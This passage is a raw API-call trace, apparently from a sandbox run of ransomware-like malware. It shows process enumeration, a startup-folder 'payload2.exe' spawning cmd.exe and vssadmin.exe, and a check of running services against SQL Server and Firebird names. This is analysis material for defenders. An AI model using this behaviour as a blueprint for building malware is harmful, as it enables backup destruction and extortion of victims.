(in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0043.223] lstrlenW (lpString="lsm.exe") returned 7 [0043.223] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.224] lstrlenW (lpString="svchost.exe") returned 11 [0043.224] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.225] lstrlenW (lpString="svchost.exe") returned 11 [0043.225] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.225] lstrlenW (lpString="svchost.exe") returned 11 [0043.225] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.226] lstrlenW (lpString="svchost.exe") returned 11 [0043.226] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.227] lstrlenW (lpString="svchost.exe") returned 11 [0043.227] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0043.227] lstrlenW (lpString="audiodg.exe") returned 11 [0043.227] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.228] lstrlenW (lpString="svchost.exe") returned 11 [0043.228] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.229] lstrlenW (lpString="svchost.exe") returned 11 [0043.229] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0043.229] lstrlenW (lpString="dwm.exe") returned 7 [0043.230] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0043.230] lstrlenW (lpString="explorer.exe") returned 12 [0043.231] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0043.231] lstrlenW (lpString="spoolsv.exe") returned 11 [0043.231] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.232] lstrlenW (lpString="taskhost.exe") returned 12 [0043.232] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.232] lstrlenW (lpString="svchost.exe") returned 11 [0043.232] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0043.233] lstrlenW (lpString="taskeng.exe") returned 11 [0043.233] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.264] lstrlenW (lpString="taskhost.exe") returned 12 [0043.265] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0043.266] lstrlenW (lpString="challenging.exe") returned 15 [0043.266] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0043.267] lstrlenW (lpString="pgp prix.exe") returned 12 [0043.268] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0043.268] lstrlenW (lpString="user-reno.exe") returned 13 [0043.268] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0043.269] lstrlenW (lpString="aggregate.exe") returned 13 [0043.270] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0043.454] lstrlenW (lpString="dressed.exe") returned 11 [0043.454] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0043.454] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0043.454] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0043.455] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0043.455] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0043.455] lstrlenW (lpString="developing.exe") returned 14 [0043.455] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0043.456] lstrlenW (lpString="supported.exe") returned 13 [0043.456] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0043.457] lstrlenW (lpString="girlstionselect.exe") returned 19 [0043.457] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0043.457] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0043.457] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0043.458] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0043.458] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0043.459] lstrlenW (lpString="eating.exe") returned 10 [0043.459] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0043.459] lstrlenW (lpString="nh_protected.exe") returned 16 [0043.459] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0043.460] lstrlenW (lpString="vulnerability.exe") returned 17 [0043.460] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0043.461] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0043.461] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0043.461] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0043.461] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0043.462] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0043.462] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0043.463] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0043.463] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.463] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.463] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0043.464] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0043.464] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.464] lstrlenW (lpString="cmd.exe") returned 7 [0043.464] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.465] lstrlenW (lpString="conhost.exe") returned 11 [0043.465] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0043.466] lstrlenW (lpString="vssadmin.exe") returned 12 [0043.466] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0043.466] lstrlenW (lpString="VSSVC.exe") returned 9 [0043.466] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0043.467] CloseHandle (hObject=0x164) returned 1 [0043.467] Sleep (dwMilliseconds=0x1f4) [0044.118] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6802d8 [0044.118] EnumServicesStatusExW (in: hSCManager=0x6802d8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0044.118] GetLastError () returned 0xea [0044.118] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x123e) returned 0x3943b50 [0044.118] EnumServicesStatusExW (in: hSCManager=0x6802d8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3943b50, cbBufSize=0x123e, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3943b50, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0044.119] CloseServiceHandle (hSCObject=0x6802d8) returned 1 [0044.119] lstrlenW (lpString="Appinfo") returned 7 [0044.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0044.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0044.119] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0044.119] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0044.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0044.119] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0044.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.119] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0044.119] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0044.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0044.119] lstrlenW (lpString="AudioSrv") returned 8 [0044.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0044.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0044.119] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0044.119] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0044.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0044.119] lstrlenW (lpString="BFE") returned 3 [0044.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0044.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0044.119] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0044.119] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0044.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0044.120] lstrlenW (lpString="CryptSvc") returned 8 [0044.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0044.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0044.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0044.120] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0044.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0044.120] lstrlenW (lpString="CscService") returned 10 [0044.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0044.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0044.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0044.120] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0044.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0044.120] lstrlenW (lpString="DcomLaunch") returned 10 [0044.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.120] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0044.120] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0044.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0044.120] lstrlenW (lpString="Dhcp") returned 4 [0044.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0044.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0044.120] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0044.120] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0044.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0044.120] lstrlenW (lpString="Dnscache") returned 8 [0044.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0044.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0044.120] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0044.120] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0044.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0044.120] lstrlenW (lpString="DPS") returned 3 [0044.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0044.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0044.120] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0044.120] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0044.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0044.120] lstrlenW (lpString="eventlog") returned 8 [0044.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0044.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0044.121] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0044.121] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0044.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0044.121] lstrlenW (lpString="EventSystem") returned 11 [0044.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0044.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0044.121] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0044.121] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0044.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0044.121] lstrlenW (lpString="gpsvc") returned 5 [0044.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0044.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0044.121] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0044.121] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0044.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0044.121] lstrlenW (lpString="iphlpsvc") returned 8 [0044.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.121] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0044.121] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0044.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0044.121] lstrlenW (lpString="LanmanServer") returned 12 [0044.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0044.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0044.121] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0044.121] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0044.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0044.121] lstrlenW (lpString="LanmanWorkstation") returned 17 [0044.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.121] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0044.121] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0044.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0044.121] lstrlenW (lpString="lmhosts") returned 7 [0044.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0044.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0044.121] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0044.121] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0044.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0044.122] lstrlenW (lpString="MMCSS") returned 5 [0044.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0044.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0044.122] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0044.122] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0044.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0044.122] lstrlenW (lpString="MpsSvc") returned 6 [0044.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0044.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0044.122] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0044.122] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0044.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0044.122] lstrlenW (lpString="Netman") returned 6 [0044.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0044.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0044.122] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0044.122] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0044.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0044.122] lstrlenW (lpString="netprofm") returned 8 [0044.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0044.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0044.122] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0044.122] lstrcmpiW 